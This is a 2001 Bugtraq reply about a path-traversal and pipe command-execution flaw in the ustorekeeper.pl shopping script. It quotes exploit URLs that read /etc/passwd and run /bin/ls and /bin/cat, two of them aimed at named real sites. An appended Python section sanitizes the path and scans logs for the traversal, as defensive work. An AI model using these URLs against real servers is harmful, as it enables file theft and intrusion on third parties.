[20034] in bugtraq
Re: new advisory
daemon@ATHENA.MIT.EDU (admin@cgisecurity.com)
Thu Apr 5 20:00:37 2001
Content-Type: text
Message-ID: <200104041735.NAA08537@iridium.mv.net>
Date: Wed, 4 Apr 2001 13:35:06 -0400
Reply-To: "admin@cgisecurity.com" <admin@CGISECURITY.COM>
From: "admin@cgisecurity.com" <admin@CGISECURITY.COM>
X-To: ukrteam@ukr.net
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <200104030408.HAA79114@fatlady.ukr.net> from "UkR hacking team"
at Apr 3, 2001 07:08:47 am
> ---=== UkR security team - Advisory ===---
> uStorekeeper(tm) Online Shopping System - Runtime Script
> - 'arbitrary file retrieval' vulnerability
> Date: 03.04.2001
> Problem: input validation error.
> Vulnerable products: ustorekeeper.pl version 1.61 (probably others, but not tested)
> Product vendor: Microburst Technologies / http://www.uburst.com
> Comment: '..' and '/' are not filtered while processing user input, so it is possible to enter arbitrary values to retrieve files from the remote server which should not be accessible normally (for ex., /etc/passwd).
The following advisory was actually found in December of 2000 by the staff
at cgisecurity.com. No bugtraq post was published, on the other hand, because
after speaking with the vendor they informed us that not every version
was affected and that the newer versions of this product have been patched.
A staff member of cgisecurity.com did make a proof of exploit for this code,
but we gave few details of the vendor because they asked us not
to.
Every so often when finding a new bug it will get posted publicly before
you can even finish looking into its full details. This has been the case for
about 5 advisories and we have scrapped them due to this. It is noted that UkR
probably had no idea that this was a published known problem and that
researching an exploit before releasing it is usually a good idea.
(Try going to google and searching for it. You will find our semi
advisory release pops up in this search.) We decided not to publish our
exploit onto bugtraq because we are not about making the lives of kiddots easier,
but if you would like to check it out, follow the link from our main site.
> Workaround:
> Author: XblP /UkR security team (www.ukrteam.ru)/GiN group (www.gin.sh)
> Greets
> Exploit:
> http://www.vulnurable.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../etc/hosts
> http://www.vulnurable.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../bin/ls |
> Example:
> http://www.lynchs.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd
> http://www.madamealexanderdollmuseum.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../../../../bin/cat%20ustorekeeper.pl|
Now is mentioning the victim websites really needed?
Finding a hole is one thing, but providing a url to click onto
to exploit it is just stupid. Hopefully none of these admins
find out and decide to sue you.
(Everybody else keep checking attrition and see if this is the case)
- zenomorph
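As an added illustration of the two defender-side pieces this thread calls for (it is not code from the thread, from uStorekeeper, or from Microburst): the class of bug described above is a `file` parameter handed to a Perl CGI script without stripping `..`, `/` or a trailing `|` (which Perl's two-argument open() treats as a pipe). The Python below shows (1) a whitelist-plus-canonicalization check that a script handling such a parameter should apply, and (2) a small detector that runs that same check over web server access-log lines so an admin can spot traversal attempts against `ustorekeeper.pl`. The document root path and the log lines are constructed sample values, not taken from any real site.

```python
import os
import re
from urllib.parse import parse_qs, urlsplit

# Assumed document root of the shop script (placeholder, not a real deployment path).
DOC_ROOT = "/var/www/ustorekeeper"

# Only plain file-name characters are allowed: no '|', '<', '>', whitespace or NULs,
# so the value can never be interpreted as a pipe or redirection by a 2-arg open().
SAFE_NAME_RE = re.compile(r"[A-Za-z0-9_./-]+")


def resolve_safe_path(base_dir, user_path):
    """Return the absolute path for user_path inside base_dir, or None if the
    request escapes base_dir (via '..' or an absolute path) or contains
    characters outside the whitelist."""
    if not user_path or not SAFE_NAME_RE.fullmatch(user_path):
        return None
    base = os.path.realpath(base_dir)
    # os.path.join discards base when user_path is absolute; realpath collapses '..'.
    candidate = os.path.realpath(os.path.join(base, user_path))
    if not candidate.startswith(base + os.sep):
        return None
    return candidate


# Common Log Format: client, identd, user, [timestamp], "METHOD target PROTO", status, size
REQ_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def flag_traversal_requests(lines, base_dir=DOC_ROOT):
    """Scan access-log lines for ustorekeeper.pl requests whose 'file' parameter
    fails resolve_safe_path(); returns (client_ip, decoded_file_value, status)."""
    hits = []
    for line in lines:
        m = REQ_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith("ustorekeeper.pl"):
            continue
        # parse_qs percent-decodes values, so '%20|' becomes ' |' before the check.
        for raw in parse_qs(parts.query).get("file", []):
            if resolve_safe_path(base_dir, raw) is None:
                hits.append((m.group("ip"), raw, int(m.group("status"))))
    return hits


# Constructed sample log lines: one legitimate catalog page, two traversal attempts.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [04/Apr/2001:13:35:06 -0400] "GET /cgi-bin/ustorekeeper.pl?command=goto&file=catalog/index.html HTTP/1.0" 200 1532',
    '10.0.0.9 - - [04/Apr/2001:13:36:10 -0400] "GET /cgi-bin/ustorekeeper.pl?command=goto&file=../../../../etc/passwd HTTP/1.0" 200 812',
    '10.0.0.9 - - [04/Apr/2001:13:36:41 -0400] "GET /cgi-bin/ustorekeeper.pl?command=goto&file=../../bin/ls%20| HTTP/1.0" 200 402',
]

if __name__ == "__main__":
    for ip, value, status in flag_traversal_requests(SAMPLE_ACCESS_LOG):
        print(f"{ip} requested file={value!r} (HTTP {status})")
```

A 200 status on a flagged request is the part worth acting on: it means the script served whatever the canonicalized path pointed at, so the same check that would have rejected the request up front also tells the admin which log entries indicate an actual disclosure rather than a failed attempt.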